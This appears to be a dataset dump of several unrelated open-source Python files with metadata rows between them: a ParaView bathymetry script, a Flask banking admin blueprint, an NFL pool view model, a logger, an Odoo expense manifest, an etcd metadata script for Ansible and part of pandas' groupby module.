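#     # the temporary profile directory is removed when the with-block exits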
|
mpl-2.0
| 83,377,925,997,244,750
| 34.678161
| 79
| 0.597777
| false
| 3.989717
| true
| false
| false
|
jasonfleming/asgs
|
output/paraviewBathyWSE.py
|
1
|
7106
|
#!/usr/bin/env python
#----------------------------------------------------------------------
# paraviewBathyWSE.py : Visualize bathy and wse simultaneously in
# Paraview.
#----------------------------------------------------------------------
# Copyright(C) 2016 Jason Fleming
#
# This file is part of the ADCIRC Surge Guidance System (ASGS).
#
# The ASGS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ASGS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the ASGS. If not, see <http://www.gnu.org/licenses/>.
#----------------------------------------------------------------------
from optparse import OptionParser
try: paraview.simple
except: from paraview.simple import *
paraview.simple._DisableFirstRenderCameraReset()
# C O M M A N D L I N E O P T I O N S
parser = OptionParser()
#parser.add_option("-i", "--interact", dest="interact", default=False,
# action="store_true", help="to enable interaction with data")
#parser.add_option("-o", "--outline", dest="outline", default=False,
# action="store_true", help="to display mesh outline")
parser.add_option("-f", "--frame", dest="frame", default=1,
help="frame to render")
parser.add_option("-m", "--magnification", dest="magnification", default=1,
help="magnification of output image (integer)")
#parser.add_option("-a", "--annotation", dest="annotation", default="null",
# help="text to place in frame")
(options, args) = parser.parse_args()
# R E A D D A T A
fort_63_nc_xmf = XDMFReader( FileName='/home/jason/projects/UNC-ASGS/2016/TableTop/08/nhcConsensus/fort.63.nc.xmf' )
fort_63_nc_xmf.PointArrays = ['sea_surface_height_above_geoid', 'BathymetricDepth']
# W A T E R S U R F A C E E L E V A T I O N
# set coloring for water surface elevation to ERDC rainbow (dark)
wseColorBar_PVLookupTable = GetLookupTableForArray( "sea_surface_height_above_geoid", 1, RGBPoints=[0.0, 0.0, 0.0, 0.423499, 0.6688949999999999, 0.0, 0.119341, 0.529244, 1.3377949999999998, 0.0, 0.238697, 0.634974, 2.00669, 0.0, 0.346853, 0.687877, 2.675585, 0.0, 0.450217, 0.718135, 3.34448, 0.0, 0.553552, 0.664836, 4.01338, 0.0, 0.651087, 0.51931, 4.682274, 0.115846, 0.724788, 0.35285, 5.3511705, 0.326772, 0.781201, 0.140185, 6.020065, 0.522759, 0.79852, 0.0284581, 6.688965, 0.703166, 0.788678, 0.00885023, 7.35786, 0.845121, 0.751141, 0.0, 8.026755, 0.955734, 0.690822, 0.0, 8.69565, 0.995407, 0.56791, 0.0618448, 9.36455, 0.987716, 0.403403, 0.164858, 10.0, 0.980407, 0.247105, 0.262699], VectorMode='Magnitude', NanColor=[0.498039, 0.0, 0.0], ColorSpace = 'Lab', ScalarRangeInitialized=1.0 )
wseColorBar_PiecewiseFunction = CreatePiecewiseFunction( Points=[0.0, 0.0, 0.5, 0.0, 10.0, 1.0, 0.5, 0.0] )
wseColorBar_PVLookupTable.ScalarOpacityFunction = wseColorBar_PiecewiseFunction
wseColorBar_PVLookupTable.LockScalarRange = 1
# use threshold filter to eliminate the -99999 values from the water
# surface elevation data
SetActiveSource(fort_63_nc_xmf) # start building the pipeline from the reader
Threshold1 = Threshold()
Threshold1.ThresholdRange = [-99998.0, 100.0]
Threshold1.Scalars = ['POINTS', 'sea_surface_height_above_geoid']
WarpByScalar1 = WarpByScalar()
WarpByScalar1.Scalars = ['POINTS', 'sea_surface_height_above_geoid']
WarpByScalar1.ScaleFactor = 0.0002
DataRepresentation1 = Show()
DataRepresentation1.ColorArrayName = ('POINT_DATA', 'sea_surface_height_above_geoid')
DataRepresentation1.ScalarOpacityFunction = wseColorBar_PiecewiseFunction
DataRepresentation1.LookupTable = wseColorBar_PVLookupTable
# B A T H Y M E T R Y / T O P O G R A P H Y
# need to remove dry areas that are below msl from the visualization
# otherwise they will show up blue in the visualization and look like
# they are underwater
SetActiveSource(fort_63_nc_xmf) # start building the pipeline from the reader
Threshold2 = Threshold()
Threshold2.Scalars = ['POINTS', 'BathymetricDepth']
Threshold2.ThresholdRange = [-100.0, 0.0]
# use Casey's bathy/topo color bar
bathyColorBar_PVLookupTable = GetLookupTableForArray( "BathymetricDepth", 1, RGBPoints=[-20.0, 0.0, 0.250004, 0.0, -10.0, 0.0, 0.500008, 0.0, -5.0, 0.0, 0.629999, 0.0, -2.0, 0.0, 0.764996, 0.0, -1.0, 0.0, 0.8, 0.0500038, -0.5, 0.0, 0.850004, 0.100008, -0.2, 0.0, 0.900008, 0.149996, -0.1, 0.0, 0.949996, 0.2, 0.0, 0.0, 1.0, 1.0, 0.0001, 1.0, 1.0, 1.0, 0.1, 1.0, 1.0, 1.0, 0.2, 0.0, 1.0, 1.0, 0.5, 0.0, 0.500008, 1.0, 1.0, 0.0, 0.4, 1.0, 2.0, 0.0, 0.299992, 1.0, 5.0, 0.0, 0.2, 1.0, 10.0, 0.0, 0.100008, 1.0, 20.0, 0.0, 0.00999466, 1.0, 50.0, 0.0, 0.0, 1.0, 100.0, 0.0, 0.0, 0.510002], VectorMode='Magnitude', NanColor=[0.498039, 0.0, 0.0], ColorSpace='RGB', ScalarRangeInitialized=1.0 )
bathyColorBar_PiecewiseFunction = CreatePiecewiseFunction( Points=[-66.632401, 0.0, 0.5, 0.0, 0.0, 1.0, 0.5, 0.0] )
bathyColorBar_PVLookupTable.ScalarOpacityFunction = bathyColorBar_PiecewiseFunction
WarpByScalar2 = WarpByScalar()
WarpByScalar2.Scalars = ['POINTS', 'BathymetricDepth']
WarpByScalar2.ScaleFactor = -0.0002
DataRepresentation5 = Show()
DataRepresentation5.EdgeColor = [0.0, 0.0, 0.5000076295109483]
DataRepresentation5.SelectionPointFieldDataArrayName = 'BathymetricDepth'
DataRepresentation5.ScalarOpacityFunction = bathyColorBar_PiecewiseFunction
DataRepresentation5.ColorArrayName = ('POINT_DATA', 'BathymetricDepth')
DataRepresentation5.ScalarOpacityUnitDistance = 0.11216901957450816
DataRepresentation5.LookupTable = bathyColorBar_PVLookupTable
DataRepresentation5.ScaleFactor = 1.2353294372558594
# T E X T A N N O T A T I O N
#Text1 = Text()
#Text1.Text = 'Hurricane Zack Exercise\nNHC Official Forecast Track\nAdvisory 8'
#DataRepresentation6 = Show()
RenderView1 = GetRenderView()
RenderView1.CameraClippingRange = [102.0, 105.0]
RenderView1.CameraFocalPoint = [-90.5, 29.5, 0.0]
RenderView1.CenterOfRotation = [-90.5, 29.5, 0.0]
RenderView1.CameraParallelScale = 1.6
RenderView1.InteractionMode = '2D'
RenderView1.CameraPosition = [-90.5, 29.5, 103.0]
RenderView1.CenterAxesVisibility = 0 # turn off axes that show center of rotation
#save screenshot
view = GetActiveView()
view.Background = [0.35,0.36,0.45] # dark gray
tsteps = fort_63_nc_xmf.TimestepValues
annTime = AnnotateTimeFilter(fort_63_nc_xmf)
# Show the filter
Show(annTime)
view.ViewTime = tsteps[int(options.frame)]
Render()
frame_file = 'test_%03d.png' % int(options.frame)
WriteImage(frame_file,Magnification=int(options.magnification))
#view.ViewTime = tsteps[100]
#Render()
#WriteImage("newtest3.png",Magnification=4)
# Save the animation to an avi file
#AnimateReader(fort_63_nc_xmf, filename="movie.avi")
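# Illustrative invocation (assumed; the .xmf input path above is hard-coded for one
# particular run):
#
#   pvpython paraviewBathyWSE.py --frame 42 --magnification 2
#
# renders time step 42 of fort.63.nc.xmf to test_042.png at twice the base resolution.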
|
gpl-3.0
| -6,397,047,685,143,120,000
| 53.661538
| 802
| 0.698987
| false
| 2.74575
| false
| false
| false
|
Pantynopants/DBMS_BANK
|
app/admin/views.py
|
1
|
6292
|
# -*- coding=utf-8 -*-
from flask import render_template, flash, redirect, url_for, request, make_response, current_app
from flask_login import login_required, current_user, login_user, logout_user
from forms import *
from ..models import *
from .. import db
from ..utils import db_utils
from . import admin
@admin.route('/')
def index():
# print("1")
return render_template('admin/index.html')
@admin.route('/login', methods=['GET', 'POST'])
def login():
"""
    if a cookie exists, log in without the form
    else give a random one
"""
form = LoginForm()
if form.validate_on_submit():
# print(form.username.data)
user = User.User.get_user_by_username(form.username.data)
if user is not None and user.verify_password(form.password.data):
login_user(user)
return redirect(request.args.get('next') or url_for('admin.index'))
else:
            flash(u'user does not exist')
# print user, form.password.data
        flash(u'log in failed')
return render_template('admin/login.html', form=form)
@admin.route('/register', methods=['GET', 'POST'])
def register():
# register_key = 'zhucema'
form = RegistrationForm()
if form.validate_on_submit() and not User.User.isUserExist(form.username.data):
# if form.registerkey.data != register_key:
        #     flash(u'Registration key does not match, please go back and try again.')
# return redirect(url_for('admin.register'))
# else:
if form.password.data != form.password2.data:
            flash(u'The two passwords entered do not match')
return redirect(url_for('admin.register'))
else:
user = User.User()
user.username=form.username.data
user.real_name=form.real_name.data
user.password=form.password.data
db_utils.commit_data(db, user)
# print(user.username)
            flash(u'You have registered successfully')
return redirect(url_for('admin.login'))
return render_template('admin/register.html', form=form)
@admin.route('/logout')
@login_required
def logout():
logout_user()
    flash(u'You have logged out of the system')
redirect_to_index = redirect(url_for('main.index'))
response = current_app.make_response(redirect_to_index )
response.set_cookie('USERID',value="GUEST")
return response
@admin.route('/transaction', methods=['GET', 'POST'])
@login_required
def transaction_modify():
user = db.session.query(User.User).filter(User.User.id == current_user.get_id()).first()
# print(a)
if user:
wallet = user.wallet
trans_instance = user.transaction
alist = user.transaction
# print(user.username)
# print(alist)
else:
flash("ERROR: can not find user")
redirect(url_for('admin.index'))
form = PostTransactionForm()
if form.validate_on_submit():
if form.payment.data != None :
if form.payment.data == 'wallet':
if form.wallet.data != None and form.wallet.data != 0:
user.pay_trans(trans=trans_instance, number = form.wallet.data)
# else:
# flash(u'nothing in wallet! use bank card instead!')
# redirect(url_for('admin.transaction'))
elif form.payment.data == 'bank_card':
if form.bank_card.data != None and form.bank_card.data != 0:
user.pay_trans(trans=trans_instance, number = form.bank_card.data)
db.session.commit()
flash(u'pay successful')
return redirect(url_for('admin.index'))
return render_template('admin/pay.html', form=form, list=alist)
@admin.route('/transaction/del', methods=['GET', 'POST'])
@login_required
def transaction_refund():
user = db.session.query(User.User).filter(User.User.id == current_user.get_id()).first()
# print(a)
if user:
wallet = user.wallet
# trans_instance = user.transaction
bill_list = user.bank_bill_item
# print(user.username)
# print(alist)
else:
flash("ERROR: can not find user")
return redirect(url_for('admin.index'))
form = PostTransactionReFundForm()
if form.validate_on_submit():
if form.serial_number.data != None:
flag = user.refund_trans(serial_number=int(form.serial_number.data))
else:
flash(u'choose one serial_number first')
return redirect(url_for('admin.index'))
db.session.commit()
if flag:
flash(u'refund successful')
# return redirect(url_for('admin.transaction_refund'))
return render_template('admin/refund.html', form=form, list=bill_list)
@admin.route('/check', methods=['GET', 'POST'])
@login_required
def check():
cost = BankBill.BankBillItem.get_total_money_in_date()
num = BankBill.BankBillItem.get_total_trans_number_in_date()
date = BankBill.BankBillItem.get_date()
bill_list = db.session.query(BankBill.BankBillItem).all()
return render_template('admin/check.html', cost = cost, number = num, data = date, list=bill_list)
# @admin.route('/category', methods=['GET', 'POST'])
# def category():
# clist = Category.query.all()
# form = PostCategoryForm()
# if form.validate_on_submit():
# category = Category(name=form.name.data)
# db.session.add(category)
#         flash(u'Category added successfully')
# return redirect(url_for('admin.index'))
# return render_template('admin/category.html', form=form, list=clist)
# @admin.route('/category/del', methods=['GET'])
# @login_required
# def category_del():
# if request.args.get('id') is not None and request.args.get('a') == 'del':
# x = Category.query.filter_by(id=request.args.get('id')).first()
# if x is not None:
# db.session.delete(x)
# db.session.commit()
#             flash(u'Deleted ' + x.name)
# return redirect(url_for('admin.category'))
#     flash(u'Please check your input')
# return redirect(url_for('admin.category'))
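# Illustrative note (not part of this file): the `admin` blueprint imported above is
# assumed to be created in app/admin/__init__.py and registered on the Flask app,
# roughly along these lines:
#
#     from flask import Blueprint
#     admin = Blueprint('admin', __name__)
#     from . import views
#
#     # in the application factory:
#     app.register_blueprint(admin, url_prefix='/admin')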
|
gpl-3.0
| -3,674,240,570,483,265,000
| 33.609195
| 102
| 0.591026
| false
| 3.498588
| false
| false
| false
|
prcutler/nflpool
|
nflpool/viewmodels/playerpicks_viewmodel.py
|
1
|
4310
|
from nflpool.viewmodels.viewmodelbase import ViewModelBase
class PlayerPicksViewModel(ViewModelBase):
def __init__(self):
self.afc_east_winner_pick = None
self.afc_east_second = None
self.afc_east_last = None
self.afc_north_winner_pick = None
self.afc_north_second = None
self.afc_north_last = None
self.afc_south_winner_pick = None
self.afc_south_second = None
self.afc_south_last = None
self.afc_west_winner_pick = None
self.afc_west_second = None
self.afc_west_last = None
self.nfc_east_winner_pick = None
self.nfc_east_second = None
self.nfc_east_last = None
self.nfc_north_winner_pick = None
self.nfc_north_second = None
self.nfc_north_last = None
self.nfc_south_winner_pick = None
self.nfc_south_second = None
self.nfc_south_last = None
self.nfc_west_winner_pick = None
self.nfc_west_second = None
self.nfc_west_last = None
self.afc_qb_pick = None
self.nfc_qb_pick = None
self.afc_rb_pick = None
self.nfc_rb_pick = None
self.afc_rec_pick = None
self.nfc_rec_pick = None
self.afc_sacks_pick = None
self.nfc_sacks_pick = None
self.afc_int_pick = None
self.nfc_int_pick = None
self.afc_wildcard1_pick = None
self.afc_wildcard2_pick = None
self.nfc_wildcard1_pick = None
self.nfc_wildcard2_pick = None
self.afc_pf_pick = None
self.nfc_pf_pick = None
self.specialteams_td_pick = None
def from_dict(self, data_dict):
self.afc_east_winner_pick = data_dict.get("afc_east_winner_pick")
self.afc_east_second = data_dict.get("afc_east_second")
self.afc_east_last = data_dict.get("afc_east_last")
self.afc_north_winner_pick = data_dict.get("afc_north_winner_pick")
self.afc_north_second = data_dict.get("afc_north_second")
self.afc_north_last = data_dict.get("afc_north_last")
self.afc_south_winner_pick = data_dict.get("afc_south_winner_pick")
self.afc_south_second = data_dict.get("afc_south_second")
self.afc_south_last = data_dict.get("afc_south_last")
self.afc_west_winner_pick = data_dict.get("afc_west_winner_pick")
self.afc_west_second = data_dict.get("afc_west_second")
self.afc_west_last = data_dict.get("afc_west_last")
self.nfc_east_winner_pick = data_dict.get("nfc_east_winner_pick")
self.nfc_east_second = data_dict.get("nfc_east_second")
self.nfc_east_last = data_dict.get("nfc_east_last")
self.nfc_north_winner_pick = data_dict.get("nfc_north_winner_pick")
self.nfc_north_second = data_dict.get("nfc_north_second")
self.nfc_north_last = data_dict.get("nfc_north_last")
self.nfc_south_winner_pick = data_dict.get("nfc_south_winner_pick")
self.nfc_south_second = data_dict.get("nfc_south_second")
self.nfc_south_last = data_dict.get("nfc_south_last")
self.nfc_west_winner_pick = data_dict.get("nfc_west_winner_pick")
self.nfc_west_second = data_dict.get("nfc_west_second")
self.nfc_west_last = data_dict.get("nfc_west_last")
self.afc_qb_pick = data_dict.get("afc_qb_pick")
self.nfc_qb_pick = data_dict.get("nfc_qb_pick")
self.afc_rb_pick = data_dict.get("afc_rb_pick")
self.nfc_rb_pick = data_dict.get("nfc_rb_pick")
self.afc_rec_pick = data_dict.get("afc_rec_pick")
self.nfc_rec_pick = data_dict.get("nfc_rec_pick")
self.afc_sacks_pick = data_dict.get("afc_sacks_pick")
self.nfc_sacks_pick = data_dict.get("nfc_sacks_pick")
self.afc_int_pick = data_dict.get("afc_int_pick")
self.nfc_int_pick = data_dict.get("nfc_int_pick")
self.afc_wildcard1_pick = data_dict.get("afc_wildcard1_pick")
self.afc_wildcard2_pick = data_dict.get("afc_wildcard2_pick")
self.nfc_wildcard1_pick = data_dict.get("nfc_wildcard1_pick")
self.nfc_wildcard2_pick = data_dict.get("nfc_wildcard2_pick")
self.afc_pf_pick = data_dict.get("afc_pf_pick")
self.nfc_pf_pick = data_dict.get("nfc_pf_pick")
self.specialteams_td_pick = data_dict.get("specialteams_td_pick")
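# Illustrative usage sketch (hypothetical values, not part of the original module):
# a submitted picks dict is loaded into the view model and read back field by field.
if __name__ == '__main__':
    picks = PlayerPicksViewModel()
    picks.from_dict({'afc_east_winner_pick': 'Patriots', 'nfc_qb_pick': 'Aaron Rodgers'})
    print(picks.afc_east_winner_pick)  # -> Patriots
    print(picks.afc_qb_pick)           # -> None (key absent from the submitted dict)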
|
mit
| 2,485,024,036,205,383,700
| 47.426966
| 75
| 0.623666
| false
| 2.802341
| false
| false
| false
|
702nADOS/sumo
|
tools/contributed/sumopy/agilepy/lib_base/logger.py
|
1
|
1227
|
import types
class Logger:
def __init__(self, filepath=None, is_stdout=True):
self._filepath = filepath
self._logfile = None
self._callbacks = {}
self._is_stdout = is_stdout
def start(self, text=''):
if self._filepath != None:
self._logfile = open(self._filepath, 'w')
self._logfile.write(text + '\n')
else:
self._logfile = None
print text
def add_callback(self, function, key='message'):
self._callbacks[key] = function
def progress(self, percent):
pass
def w(self, data, key='message', **kwargs):
# print 'w:',data,self._callbacks
if self._logfile != None:
self._logfile.write(str(data) + '\n')
elif self._callbacks.has_key(key):
kwargs['key'] = key
self._callbacks[key](data, **kwargs)
# elif type(data)==types.StringType:
# print data
if self._is_stdout:
print str(data)
def stop(self, text=''):
if self._logfile != None:
self._logfile.write(text + '\n')
self._logfile.close()
self._logfile = None
else:
print text
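# Illustrative usage sketch (not part of the original module): stdout-only logging
# with an optional callback hooked to the default 'message' key.
if __name__ == '__main__':
    demo_log = Logger(filepath=None, is_stdout=True)
    demo_log.add_callback(lambda data, **kwargs: None, key='message')
    demo_log.start('demo started')
    demo_log.w('first message')    # echoed to stdout and handed to the callback
    demo_log.stop('demo finished')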
|
gpl-3.0
| 895,495,032,246,819,500
| 26.266667
| 54
| 0.519152
| false
| 4.131313
| false
| false
| false
|
ayepezv/GAD_ERP
|
addons/hr_expense/__openerp__.py
|
2
|
1889
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
{
'name': 'Expense Tracker',
'version': '2.0',
'category': 'Human Resources',
'sequence': 95,
'summary': 'Expenses Validation, Invoicing',
'description': """
Manage expenses by Employees
============================
This application allows you to manage your employees' daily expenses. It gives you access to your employees’ fee notes and gives you the right to complete and validate or refuse the notes. After validation it creates an invoice for the employee.
Employee can encode their own expenses and the validation flow puts it automatically in the accounting after validation by managers.
The whole flow is implemented as:
---------------------------------
* Draft expense
* Submitted by the employee to his manager
* Approved by his manager
* Validation by the accountant and accounting entries creation
This module also uses analytic accounting and is compatible with the invoice on timesheet module so that you are able to automatically re-invoice your customers' expenses if you work by project.
""",
'website': 'https://www.odoo.com/page/expenses',
'depends': ['hr_contract', 'account_accountant', 'report', 'web_tour'],
'data': [
'security/ir.model.access.csv',
'data/hr_expense_data.xml',
'data/hr_expense_sequence.xml',
'wizard/hr_expense_refuse_reason.xml',
'wizard/hr_expense_register_payment.xml',
'views/hr_expense_views.xml',
'security/ir_rule.xml',
'report/report_expense_sheet.xml',
'views/hr_dashboard.xml',
'views/hr_expense.xml',
'views/tour_views.xml',
'views/res_config_views.xml',
'data/web_planner_data.xml',
],
'demo': ['data/hr_expense_demo.xml'],
'installable': True,
'application': True,
}
|
gpl-3.0
| -3,994,445,756,238,314,000
| 38.3125
| 244
| 0.661897
| false
| 3.914938
| false
| false
| false
|
meatballhat/ansible-inventory-hacks
|
ansible_inventory_hacks/etcd/touch.py
|
1
|
2242
|
#!/usr/bin/env python
# vim:fileencoding=utf-8
import argparse
import datetime
import os
import socket
import subprocess
import sys
import etcd
from . import DEFAULT_PREFIX
ETCD_KEY_TMPL = '{prefix}/{hostname}/{key}'
USAGE = """%(prog)s [options]
Splat some metadata into etcd!
"""
def main(sysargs=sys.argv[:]):
parser = argparse.ArgumentParser(
usage=USAGE, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'hostname', metavar='ANSIBLE_HOSTNAME',
default=os.getenv('ANSIBLE_HOSTNAME'),
help='hostname that is being touched')
parser.add_argument(
'-s', '--server', metavar='ETCD_SERVER',
default=os.getenv('ETCD_SERVER', '127.0.0.1'),
help='etcd server ip or hostname')
parser.add_argument(
'-p', '--prefix', metavar='ETCD_PREFIX',
default=os.getenv('ETCD_PREFIX', DEFAULT_PREFIX),
help='etcd key prefix')
parser.add_argument(
'-P', '--playbook', metavar='ANSIBLE_PLAYBOOK',
default=os.getenv('ANSIBLE_PLAYBOOK'),
help='the name of the playbook that is being run')
parser.add_argument(
'-T', '--team', metavar='TEAM',
default=os.environ.get('TEAM', 'UNKNOWN'),
help='the team name that will be included in the touch metadata')
args = parser.parse_args(sysargs[1:])
client = etcd.Client(host=args.server)
_set_metadata(client, args.playbook, args.hostname, args.team, args.prefix)
return 0
def _set_metadata(client, playbook, hostname, team, prefix):
for key, value in _etcd_metadata(playbook, hostname, team).iteritems():
etcd_key = ETCD_KEY_TMPL.format(
prefix=prefix, hostname=hostname, key=key)
client.set(etcd_key, value)
def _etcd_metadata(playbook, hostname, team):
return {
'playbook': playbook,
'hostname': hostname,
'local_user': os.getlogin(),
'local_host': socket.gethostname(),
'local_git_ref': _git_ref(),
'timestamp': datetime.datetime.utcnow().isoformat(),
'team': team,
}
def _git_ref():
return subprocess.check_output(['git', 'rev-parse', '-q', 'HEAD']).strip()
if __name__ == '__main__':
sys.exit(main())
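# Illustrative invocation (placeholder values; assumes the package is importable):
#
#   ETCD_SERVER=10.0.0.5 python -m ansible_inventory_hacks.etcd.touch web01 \
#       --playbook site.yml --team platform
#
# which writes {prefix}/web01/playbook, {prefix}/web01/timestamp, {prefix}/web01/team
# and the other _etcd_metadata keys into etcd, with prefix defaulting to DEFAULT_PREFIX.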
|
mit
| -579,326,199,278,497,900
| 27.74359
| 79
| 0.630687
| false
| 3.645528
| false
| false
| false
|
datapythonista/pandas
|
pandas/core/groupby/generic.py
|
1
|
63278
|
"""
Define the SeriesGroupBy and DataFrameGroupBy
classes that hold the groupby interfaces (and some implementations).
These are user facing as the result of the ``df.groupby(...)`` operations,
which here returns a DataFrameGroupBy object.
"""
from __future__ import annotations
from collections import (
abc,
namedtuple,
)
from functools import partial
from textwrap import dedent
from typing import (
Any,
Callable,
Hashable,
Iterable,
Mapping,
TypeVar,
Union,
)
import warnings
import numpy as np
from pandas._libs import (
lib,
reduction as libreduction,
)
from pandas._typing import (
ArrayLike,
FrameOrSeries,
FrameOrSeriesUnion,
Manager2D,
)
from pandas.util._decorators import (
Appender,
Substitution,
doc,
)
from pandas.core.dtypes.common import (
ensure_int64,
is_bool,
is_categorical_dtype,
is_dict_like,
is_integer_dtype,
is_interval_dtype,
is_numeric_dtype,
is_scalar,
)
from pandas.core.dtypes.missing import (
isna,
notna,
)
from pandas.core import (
algorithms,
nanops,
)
from pandas.core.aggregation import (
maybe_mangle_lambdas,
reconstruct_func,
validate_func_kwargs,
)
from pandas.core.apply import GroupByApply
from pandas.core.base import (
DataError,
SpecificationError,
)
import pandas.core.common as com
from pandas.core.construction import create_series_with_explicit_dtype
from pandas.core.frame import DataFrame
from pandas.core.generic import NDFrame
from pandas.core.groupby import base
from pandas.core.groupby.groupby import (
GroupBy,
_agg_template,
_apply_docs,
_transform_template,
group_selection_context,
)
from pandas.core.indexes.api import (
Index,
MultiIndex,
all_indexes_same,
)
from pandas.core.series import Series
from pandas.core.util.numba_ import maybe_use_numba
from pandas.plotting import boxplot_frame_groupby
NamedAgg = namedtuple("NamedAgg", ["column", "aggfunc"])
# TODO(typing) the return value on this callable should be any *scalar*.
AggScalar = Union[str, Callable[..., Any]]
# TODO: validate types on ScalarResult and move to _typing
# Blocked from using by https://github.com/python/mypy/issues/1484
# See note at _mangle_lambda_list
ScalarResult = TypeVar("ScalarResult")
def generate_property(name: str, klass: type[FrameOrSeries]):
"""
Create a property for a GroupBy subclass to dispatch to DataFrame/Series.
Parameters
----------
name : str
klass : {DataFrame, Series}
Returns
-------
property
"""
def prop(self):
return self._make_wrapper(name)
parent_method = getattr(klass, name)
prop.__doc__ = parent_method.__doc__ or ""
prop.__name__ = name
return property(prop)
def pin_allowlisted_properties(klass: type[FrameOrSeries], allowlist: frozenset[str]):
"""
Create GroupBy member defs for DataFrame/Series names in a allowlist.
Parameters
----------
klass : DataFrame or Series class
class where members are defined.
allowlist : frozenset[str]
Set of names of klass methods to be constructed
Returns
-------
class decorator
Notes
-----
Since we don't want to override methods explicitly defined in the
base class, any such name is skipped.
"""
def pinner(cls):
for name in allowlist:
if hasattr(cls, name):
# don't override anything that was explicitly defined
# in the base class
continue
prop = generate_property(name, klass)
setattr(cls, name, prop)
return cls
return pinner
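# Illustrative note (not part of pandas): applied as a class decorator below,
# `pin_allowlisted_properties` turns every allowlisted Series/DataFrame method name
# into a delegating property, e.g. (hypothetical allowlist):
#
#     @pin_allowlisted_properties(Series, frozenset({"dtype", "unique"}))
#     class SeriesGroupBy(GroupBy[Series]):
#         ...
#
# would give SeriesGroupBy `dtype` and `unique` attributes that dispatch through
# GroupBy._make_wrapper to the underlying Series objects.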
@pin_allowlisted_properties(Series, base.series_apply_allowlist)
class SeriesGroupBy(GroupBy[Series]):
_apply_allowlist = base.series_apply_allowlist
def _iterate_slices(self) -> Iterable[Series]:
yield self._selected_obj
_agg_examples_doc = dedent(
"""
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.groupby([1, 1, 2, 2]).min()
1 1
2 3
dtype: int64
>>> s.groupby([1, 1, 2, 2]).agg('min')
1 1
2 3
dtype: int64
>>> s.groupby([1, 1, 2, 2]).agg(['min', 'max'])
min max
1 1 2
2 3 4
The output column names can be controlled by passing
the desired column names and aggregations as keyword arguments.
>>> s.groupby([1, 1, 2, 2]).agg(
... minimum='min',
... maximum='max',
... )
minimum maximum
1 1 2
2 3 4
.. versionchanged:: 1.3.0
The resulting dtype will reflect the return value of the aggregating function.
>>> s.groupby([1, 1, 2, 2]).agg(lambda x: x.astype(float).min())
1 1.0
2 3.0
dtype: float64"""
)
@Appender(
_apply_docs["template"].format(
input="series", examples=_apply_docs["series_examples"]
)
)
def apply(self, func, *args, **kwargs):
return super().apply(func, *args, **kwargs)
@doc(_agg_template, examples=_agg_examples_doc, klass="Series")
def aggregate(self, func=None, *args, engine=None, engine_kwargs=None, **kwargs):
if maybe_use_numba(engine):
with group_selection_context(self):
data = self._selected_obj
result, index = self._aggregate_with_numba(
data.to_frame(), func, *args, engine_kwargs=engine_kwargs, **kwargs
)
return self.obj._constructor(result.ravel(), index=index, name=data.name)
relabeling = func is None
columns = None
if relabeling:
columns, func = validate_func_kwargs(kwargs)
kwargs = {}
if isinstance(func, str):
return getattr(self, func)(*args, **kwargs)
elif isinstance(func, abc.Iterable):
# Catch instances of lists / tuples
# but not the class list / tuple itself.
func = maybe_mangle_lambdas(func)
ret = self._aggregate_multiple_funcs(func)
if relabeling:
# error: Incompatible types in assignment (expression has type
# "Optional[List[str]]", variable has type "Index")
ret.columns = columns # type: ignore[assignment]
return ret
else:
cyfunc = com.get_cython_func(func)
if cyfunc and not args and not kwargs:
return getattr(self, cyfunc)()
if self.grouper.nkeys > 1:
return self._python_agg_general(func, *args, **kwargs)
try:
return self._python_agg_general(func, *args, **kwargs)
except KeyError:
# TODO: KeyError is raised in _python_agg_general,
# see test_groupby.test_basic
result = self._aggregate_named(func, *args, **kwargs)
index = Index(sorted(result), name=self.grouper.names[0])
return create_series_with_explicit_dtype(
result, index=index, dtype_if_empty=object
)
agg = aggregate
def _aggregate_multiple_funcs(self, arg) -> DataFrame:
if isinstance(arg, dict):
# show the deprecation, but only if we
# have not shown a higher level one
# GH 15931
raise SpecificationError("nested renamer is not supported")
elif any(isinstance(x, (tuple, list)) for x in arg):
arg = [(x, x) if not isinstance(x, (tuple, list)) else x for x in arg]
# indicated column order
columns = next(zip(*arg))
else:
# list of functions / function names
columns = []
for f in arg:
columns.append(com.get_callable_name(f) or f)
arg = zip(columns, arg)
results: dict[base.OutputKey, FrameOrSeriesUnion] = {}
for idx, (name, func) in enumerate(arg):
key = base.OutputKey(label=name, position=idx)
results[key] = self.aggregate(func)
if any(isinstance(x, DataFrame) for x in results.values()):
from pandas import concat
res_df = concat(
results.values(), axis=1, keys=[key.label for key in results.keys()]
)
# error: Incompatible return value type (got "Union[DataFrame, Series]",
# expected "DataFrame")
return res_df # type: ignore[return-value]
indexed_output = {key.position: val for key, val in results.items()}
output = self.obj._constructor_expanddim(indexed_output, index=None)
output.columns = Index(key.label for key in results)
output = self._reindex_output(output)
return output
def _cython_agg_general(
self, how: str, alt: Callable, numeric_only: bool, min_count: int = -1
):
obj = self._selected_obj
objvals = obj._values
data = obj._mgr
if numeric_only and not is_numeric_dtype(obj.dtype):
# GH#41291 match Series behavior
raise NotImplementedError(
f"{type(self).__name__}.{how} does not implement numeric_only."
)
# This is overkill because it is only called once, but is here to
# mirror the array_func used in DataFrameGroupBy._cython_agg_general
def array_func(values: ArrayLike) -> ArrayLike:
try:
result = self.grouper._cython_operation(
"aggregate", values, how, axis=data.ndim - 1, min_count=min_count
)
except NotImplementedError:
# generally if we have numeric_only=False
# and non-applicable functions
# try to python agg
# TODO: shouldn't min_count matter?
result = self._agg_py_fallback(values, ndim=data.ndim, alt=alt)
return result
result = array_func(objvals)
ser = self.obj._constructor(
result, index=self.grouper.result_index, name=obj.name
)
return self._reindex_output(ser)
def _wrap_aggregated_output(
self,
output: Mapping[base.OutputKey, Series | ArrayLike],
) -> Series:
"""
Wraps the output of a SeriesGroupBy aggregation into the expected result.
Parameters
----------
output : Mapping[base.OutputKey, Union[Series, ArrayLike]]
Data to wrap.
Returns
-------
Series
Notes
-----
In the vast majority of cases output will only contain one element.
The exception is operations that expand dimensions, like ohlc.
"""
assert len(output) == 1
name = self.obj.name
index = self.grouper.result_index
